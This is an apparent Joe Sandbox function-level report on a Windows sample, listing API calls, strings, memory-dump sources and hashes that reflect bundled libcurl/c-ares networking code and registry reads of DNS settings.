Opcode Fuzzy Hash: ad9eb0b1fe2e4fc32b7ec129f2853989ae8ec83d934f48383696a11851861888
Instruction Fuzzy Hash: 2ED1B4B49043199FCB40EFA8C58569EBBF0FF48344F0089ADE498A7351E7749A84CF62

Function 009729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00972A27
RegOpenKeyExA.KERNELBASE ref: 00972A8A
CharUpperA.USER32 ref: 00972AEF
QueryFullProcessImageNameA.KERNELBASE ref: 00972C26
CloseHandle.KERNELBASE ref: 00972C49
CloseHandle.KERNELBASE ref: 00972DFC

Strings

0, xrefs: 00972DA9

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
String ID: 0
API String ID: 2406880114-4108050209
Opcode ID: 50fefa31e38cca333c7276b5d30433c9c3bb3610994dc9eb191dfe60ddbaa2b1
Instruction ID: 7b2311c3e187907368083a5d400afdc488e5c9860b73cc6da196abb33e9e61ea
Opcode Fuzzy Hash: 50fefa31e38cca333c7276b5d30433c9c3bb3610994dc9eb191dfe60ddbaa2b1
Instruction Fuzzy Hash: 90E109B19043199FCB50EF68D98569DBBF5EF84700F008869E488EB354E774DA88DF52

Function 009805B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00980711
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 009809DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 009809FB

Strings

multi.c, xrefs: 009807B2

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: EventSelect$EnumEventsNetwork
String ID: multi.c
API String ID: 2170980988-214371023
Opcode ID: 0c9e1fe59ec5cfd4420e7adc907998d139ebf19be592f434180a3ed00b0890c3
Instruction ID: 34e0a9dcb40aa5b78e28eb654a291554b3d19718fd89a2694c6da72ad18b6a80
Opcode Fuzzy Hash: 0c9e1fe59ec5cfd4420e7adc907998d139ebf19be592f434180a3ed00b0890c3
Instruction Fuzzy Hash: 94D1BE716083019FEB50EF64CC81B6BB7E9BFD4708F04882CF89596252E775E958CB52

Function 00986FA0 Relevance: 6.3, APIs: 4, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5736b0fe2d14ee5b4d6738b486fbdbf6a0243980ad52b74a624b2766b6ac066e
Instruction ID: 948b12243d81f6c5f8017240dcb442cb86ef1cea5864e2399c2a93f9d7382893
Opcode Fuzzy Hash: 5736b0fe2d14ee5b4d6738b486fbdbf6a0243980ad52b74a624b2766b6ac066e
Instruction Fuzzy Hash: 7591D33160D3094BD735AAA888847BBF2D9ABC4364F348B2CE8A9472D4E775DD40D792

Function 00A3B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 00A3B2B7

Strings

ares__sortaddrinfo.c, xrefs: 00A3B3ED
cur != NULL, xrefs: 00A3B3F2

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: getsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 3358416759-2430778319
Opcode ID: 1dc4474cb65e1ca7f016075ca78265d3572711ca9ee6291c40f7067ad53727b5
Instruction ID: ab9cf2d98e76ddb8a33d14b176d24582290ca332d80a38ca41fb52c9bd3ffa7e
Opcode Fuzzy Hash: 1dc4474cb65e1ca7f016075ca78265d3572711ca9ee6291c40f7067ad53727b5
Instruction Fuzzy Hash: A3C181716143159FD718DF24C981A6AB7E2FF88304F05896CFA4A8B3A2D730ED45CBA1

Function 00A3A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00A2712E,?,?,?,00001001,00000000), ref: 00A3A90D

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: 931eb396f72518e350460742218895b832cb9414ec25f6e7788bffb71f125a5c
Instruction ID: 490c91cce0707d6db4ee4caaf46ce9af574ffbe846d9e38a6f708dd0cd4ecb17
Opcode Fuzzy Hash: 931eb396f72518e350460742218895b832cb9414ec25f6e7788bffb71f125a5c
Instruction Fuzzy Hash: 78F06D75208318AFD2109F41DC48E6BBBEDFFCD754F05455DF988232118270AE10CAB2

Function 00A2A440 Relevance: 50.1, APIs: 19, Strings: 9, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00A2AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00A2AA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00A2AA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00A2AAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00A2AB30
RegCloseKey.KERNELBASE(?), ref: 00A2AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00A2AB82
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00A2AC46
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00A2AD0A
RegEnumKeyExA.KERNELBASE ref: 00A2AD8D
RegCloseKey.KERNELBASE(?), ref: 00A2ADD9
RegEnumKeyExA.KERNELBASE ref: 00A2AE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00A2AE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00A2AE54
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00A2AF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00A2AFB2
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00A2B072

Strings

Software\Policies\Microsoft\System\DNSClient, xrefs: 00A2AC3C
PrimaryDNSSuffix, xrefs: 00A2AC6B, 00A2ACAE
SearchList, xrefs: 00A2AA46, 00A2AA91, 00A2ABA7, 00A2ABEA, 00A2AE4E, 00A2AE9D
DhcpDomain, xrefs: 00A2B06C, 00A2B0BB
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 00A2AB78
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00A2AA0F
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 00A2AD00
C;, xrefs: 00A2A845
Domain, xrefs: 00A2AAE3, 00A2AB2A, 00A2AF5D, 00A2AFAC

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: QueryValue$Open$CloseEnum
String ID: C;$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 4217438148-2839143964
Opcode ID: c1d9694e3ef64b53b35798ddc725c1f0daa142b2bd1afbbb7d64f9046c88d0fb
Instruction ID: 8a1aae75cf426e76459e5afd170bf8df228d81e812fc0821acaebfd48039bf62
Opcode Fuzzy Hash: c1d9694e3ef64b53b35798ddc725c1f0daa142b2bd1afbbb7d64f9046c88d0fb
Instruction Fuzzy Hash: 3672AEB1604311AFE7209B28DC82F6BB7E8AF95740F145838F989DB291E771E944CB53

Function 009AA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 009AA831

Strings

Couldn't bind to '%s' with errno %d: %s, xrefs: 009AAE1F
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 009AAD0A
@, xrefs: 009AA8F4
Bind to local port %d failed, trying next, xrefs: 009AAFE5
Name '%s' family %i resolved to '%s' family %i, xrefs: 009AADAC
Local Interface %s is ip %s using address family %i, xrefs: 009AAE60
cf_socket_open() -> %d, fd=%d, xrefs: 009AA796
cf-socket.c, xrefs: 009AA5CD, 009AA735
@, xrefs: 009AAC42
Could not set TCP_NODELAY: %s, xrefs: 009AA871
Trying %s:%d..., xrefs: 009AA7C2, 009AA7DE
bind failed with errno %d: %s, xrefs: 009AB080
Local port: %hu, xrefs: 009AAF28
Trying [%s]:%d..., xrefs: 009AA689
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 009AA6CE

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: setsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3981526788-2373386790
Opcode ID: 3d833e607e3509b926d2b685f06466febedd10dd30715dda1bf0c743327b29dd
Instruction ID: afe072a6ede39c996e225953ad8faba8a87469dcec6ea366546cfed3f2ac09a7
Opcode Fuzzy Hash: 3d833e607e3509b926d2b685f06466febedd10dd30715dda1bf0c743327b29dd
Instruction Fuzzy Hash: 3762E271508341AFE721CF24C846BABB7E9BF96314F044929F98897292E771E845CBD3

Function 00A39740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00A39946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00A39974
RegCloseKey.KERNELBASE(?), ref: 00A3998B

Strings

DatabasePath, xrefs: 00A3996B
CARES_HOSTS, xrefs: 00A39788
\hos, xrefs: 00A3999A
sts, xrefs: 00A399A2
#, xrefs: 00A39B9D
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00A3993C
#, xrefs: 00A39A3F

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3677997916-4129964100
Opcode ID: 7bc6f77f2836c5f0efcebf6ad63a8cede722c2f339be43c162a6a51c89913266
Instruction ID: 4c1e77afd7fdfdb3b3abe8b0868c3dcee7e3eb73dd35faa8cfbb3ca33107f97f
Opcode Fuzzy Hash: 7bc6f77f2836c5f0efcebf6ad63a8cede722c2f339be43c162a6a51c89913266
Instruction Fuzzy Hash: BB32D3F1904201ABEB11AB24FD42B1BB6E8AF54354F084838FD0996263FB71ED64D793

Function 009A8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 009A8C30
SleepEx.KERNELBASE(00000000,00000000), ref: 009A8CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 009A8D0F

Strings

cf-socket.c, xrefs: 009A8EDF
connect to %s port %u from %s port %d failed: %s, xrefs: 009A8E78
local address %s port %d..., xrefs: 009A8C7F
connected, xrefs: 009A8DA7
not connected yet, xrefs: 009A8BDC

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 1669343778-879669977
Opcode ID: d0d8e6c1bd3fd8d1b5057f8ac0bf1222d4ede440259ba5c19c3ea5c838cd3800
Instruction ID: e13cc87ea28f1bfbac7ec3556ed5782c0c5587ba6e0bb4e4c97af84514c9dd8b
